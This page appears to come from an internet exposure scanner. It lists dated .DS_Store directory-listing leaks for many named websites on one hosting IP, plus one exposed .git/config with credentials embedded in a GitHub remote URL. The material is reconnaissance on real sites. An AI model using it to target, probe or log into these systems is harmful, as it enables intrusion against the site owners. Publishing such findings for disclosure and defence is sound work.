/wp-includes/SimplePie /wp-includes/Text /wp-includes/theme-compat /wp-snapshots
Found on 2024-09-13 00:01 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cef4770e6ef4770e677d071b8249d3e0bef342ccf792ff97eFound 42 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2014/10 /wp-content/uploads/2015 /wp-includes /wp-snapshots
Found on 2024-08-24 19:14 -
Severity: low
Fingerprint: 5f32cf5d6962f09c4239b3d84239b3d81a0e27f27b4e6e867477c597d200d55bFound 8 files trough .DS_Store spidering: /.idea /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2024-08-18 21:19 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c248e4f81248e4f81da6f9b432bf7e266d47cef5833c9267eFound 41 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2015 /wp-includes /wp-snapshots
Found on 2024-05-29 19:44 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f267656412fc17a2402c7a0ee4f232867Found 10 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2022-09-03 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-15 17:38
Last seen 2024-09-16 18:46
Open for 732 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-09-16 18:46 -
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b22ee27c3c0b24ffef617025c0b216be3Found 14 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-09-12 20:02 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-09-10 22:59 -
Severity: low
Fingerprint: 5f32cf5d6962f09cccdd54a0ccdd54a01a619ebcabab5f858f67bfe7153b3243Found 13 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-09-08 09:11 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733fad82b89f858ea44a282594c078c97bdeFound 10 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /config /public /resources /storage /vendor
Found on 2024-09-06 06:02 -
Severity: low
Fingerprint: 5f32cf5d6962f09c026392ab026392ab7a4b325398b29a745914566c0e320c5eFound 7 files trough .DS_Store spidering: /app /config /public /resources /resources/views /storage /vendor
Found on 2024-09-01 13:17 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-08-30 14:06 -
Severity: low
Fingerprint: 5f32cf5d6962f09cec7f8772ec7f8772692eda2a46489afb9c8a8871b1c20f5eFound 11 files trough .DS_Store spidering: /app /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-08-26 17:49 -
Severity: low
Fingerprint: 5f32cf5d6962f09c11d3744d11d3744d7da9d3d1721513ecb65012164009fb37Found 12 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-08-16 01:57 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af247251dec61f970f3a6842d5ea24eb2f28027Found 9 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /config /public /resources /storage /vendor
Found on 2024-08-14 18:47 -
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814ec721680e6381ef3f67011c55e2ac33feFound 6 files trough .DS_Store spidering: /app /config /public /resources /storage /vendor
Found on 2024-08-12 20:17 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-08-01 16:33 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-07-16 01:48
-
-
Git configuration and history exposed
The following URL (usually
/.git/config) is publicly accessible and is leaking source code and repository configuration.Additionally the GIT credentials are present and could give unauthorized access to source code repository of private projects.
First seen 2024-07-02 05:31
Last seen 2024-09-16 18:26
Open for 76 days-
Severity: critical
Fingerprint: 2580fa947178c88602b1737db148c044b81b03713d63bb82370a65227548d73b[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true symlinks = false [user] email = gitium@presslabs.com name = Gitium [push] default = matching [remote "origin"] url = https://user:pass@github.com/ericbrianpearson/sweetandloai fetch = +refs/heads/*:refs/remotes/origin/* [branch "main"] remote = origin merge = refs/heads/main
Found on 2024-09-16 18:26376 Bytes
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: sydney.austynandbrian.com
Port: 443
URL: https://sydney.austynandbrian.comFirst seen 2022-11-23 18:39
Last seen 2024-09-16 18:10
Open for 662 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 18:10
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: mail.cuir-panda-leather.ca
Port: 443
URL: https://mail.cuir-panda-leather.caFirst seen 2022-10-19 17:59
Last seen 2024-09-16 18:09
Open for 698 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2024-09-16 18:09 -
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814e2e65bb97b363c985b81f17d9d482e563Found 6 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /images /Photoshop /SpryAssets
Found on 2024-08-06 14:17
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.miriam.austynandbrian.com
Port: 443
URL: https://www.miriam.austynandbrian.comFirst seen 2022-09-23 17:37
Last seen 2024-09-16 17:46
Open for 724 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 17:46
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-28 17:49
Last seen 2024-09-16 17:23
Open for 718 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c99d3320899d33208e922b3c9809eb348743ca9dff4d57f56Found 44 files trough .DS_Store spidering: /_notes /about.html /archive template /blog-single.html /blog.html /contact.html /contact.php /css /Documentation /fonts /img /img/_notes /img/about_BU.jpg /img/comment-1.jpg /img/comment-2.jpg /img/comment-3.jpg /img/comment-4.jpg /img/favicon.png /img/logo-munnely-.jpg /img/logo.png /img/logo_.png /img/munnelly_logo.jpg /img/post-1.jpg /img/post-2.jpg /img/post-3.jpg /img/post-4.jpg /img/post-5.jpg /img/post-6.jpg /img/skills_BU.jpg /img/Thumbs.db /img/work-1_BU.jpg /img/work-2_BU.jpg /img/work-3_BU.jpg /img/work-4.jpg /img/work-5.jpg /img/work-6.jpg /img/work-7.jpg /img/work-8.jpg /img/work-9.jpg /index.html /js /works-single.html /works.html /writing.html
Found on 2024-09-16 17:23
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-01-19 18:48
Last seen 2024-09-16 17:22
Open for 605 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e9466051ac734856ccb5d31acf1720259eFound 5 files trough .DS_Store spidering: /asset /css /fonts /images /js
Found on 2024-09-16 17:22
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-21 18:48
Last seen 2024-09-16 17:09
Open for 634 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 17:09
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.jenna.austynandbrian.com
Port: 443
URL: https://www.jenna.austynandbrian.comFirst seen 2022-11-23 18:39
Last seen 2024-09-16 16:37
Open for 662 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 16:37
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.quezztioncash.quezztion.com
Port: 443
URL: https://www.quezztioncash.quezztion.comFirst seen 2022-09-06 17:39
Last seen 2024-09-16 16:35
Open for 740 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c92dfb71592dfb715c6a6126fce46e9735d42ef81e57d38e8Found 45 files trough .DS_Store spidering: /.DS_Store /about.php /app_pics /config.php /connect-db.php /connexion.php /Database /default /default/css /default/images /delete.php /delete_cat.php /delete_questions.php /edit.php /edit_cat.php /edit_infos.php /edit_questions.php /footer.php /header.php /ht.txt /index.php /jscolor /json.php /json_category /json_questions /mail_login.php /media /new.php /new_cat.php /new_questions.php /profile.php /scripts /sign_up.php /style /style/images /style/js /thumbnails /upload.php /users.php /view-paginated.php /view-paginated_cat.php /view-paginated_questions.php /view.php /view_cat.php /view_questions.php
Found on 2024-09-16 16:35 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a3564b8ed187db8f05fb1b0d3f93e5e73fFound 43 files trough .DS_Store spidering: /.DS_Store /about.php /app_pics /config.php /connect-db.php /connexion.php /Database /default /default/css /default/images /delete.php /delete_cat.php /delete_questions.php /edit.php /edit_cat.php /edit_infos.php /edit_questions.php /footer.php /header.php /ht.txt /index.php /jscolor /json.php /json_category /json_questions /mail_login.php /media /new.php /new_cat.php /new_questions.php /profile.php /scripts /sign_up.php /style /thumbnails /upload.php /users.php /view-paginated.php /view-paginated_cat.php /view-paginated_questions.php /view.php /view_cat.php /view_questions.php
Found on 2024-08-20 06:56
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: miriam.austynandbrian.com
Port: 443
URL: https://miriam.austynandbrian.comFirst seen 2022-09-23 17:37
Last seen 2024-09-16 16:33
Open for 723 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 16:33
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-15 18:48
Last seen 2024-09-16 16:20
Open for 670 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146bd709a4939e89f2aeca6749acb9c6f979Found 21 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor
Found on 2024-09-16 16:20 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-09-12 17:31 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-09-08 23:35 -
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-08-22 11:18 -
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcb3f27bc0f1583bf9b622747351ac7f20Found 22 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic
Found on 2024-08-18 06:02 -
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbecbebd11f020c27e09ac3db5a3e0978adfFound 17 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-08-16 07:23 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-08-14 03:02 -
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea969d9d335f9934f705c12d53258a00b9eFound 23 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser
Found on 2024-08-04 20:59 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-06-08 15:33 -
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b22ee27c3c0b24ffef617025c0b216be3Found 14 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2022-11-15 18:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-16 18:43
Last seen 2024-09-16 16:12
Open for 669 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-09-16 16:12 -
Severity: medium
Fingerprint: 5f32cf5d6962f09ca629b8b1a629b8b143a27af3538b923450299d7b7927ec8aFound 34 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-08-26 12:43 -
Severity: low
Fingerprint: 5f32cf5d6962f09cf35cbfb3f35cbfb391cb3501500dced2dac33721c3fa9fc9Found 29 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-06-02 13:50
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-31 18:55
Last seen 2024-09-16 16:01
Open for 624 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c778888b4778888b43443393d58fc2c8742783f2be340ec03Found 40 files trough .DS_Store spidering: /admin-ajax.php /after_disaster_relief.css /after_disaster_relief.html /all_dropdown.css /commercial_dinhome_home.css /commercial_renovations.css /commercial_renovations.html /constrcution_worker_jobs_employment.css /constrcution_worker_jobs_employment.html /demolition.css /demolition.html /demolition_frame2.png /dinhome_contact.html /dinhome_home.css /dinhome_home_projects.css /favicon-16x16.png /favicon-32x32.png /home_renovations.css /home_renovations.html /images /images/logo-DinHome-Design.png /index.html /interior_design.css /interior_design.html /job /main.css /new_construction.css /new_construction.html /NK2502_Topo_anglais_2020-02-07_Land_Serveyor.dwg /privacy_statement_of_dinhome_design.html /privacy_statement_of_dinhome_design_main.css /project_management.css /project_management.html /projects_progress_folders /projects_progress_folders.zip /Rapport étude de sol lot SOIL SAMPLES # 1 557 039.PDF /respond.min.js /SpryAssets /structural_modifications.css /structural_modifications.html
Found on 2024-09-16 16:01
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.crescofamilydentistry.com
Port: 443
URL: https://www.crescofamilydentistry.comFirst seen 2022-09-03 17:48
Last seen 2024-09-16 15:36
Open for 743 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c87f05b7087f05b70375faefa4ce46cd5179878e9afa5fbd6Found 26 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-16 15:36 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cb3107650b31076505d8d3f5a68139ff5a664350911313d28Found 39 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-14 13:06 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c248e4f81248e4f81da6f9b432bf7e266d47cef5833c9267eFound 41 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2015 /wp-includes /wp-snapshots
Found on 2024-09-14 13:06 -
Severity: low
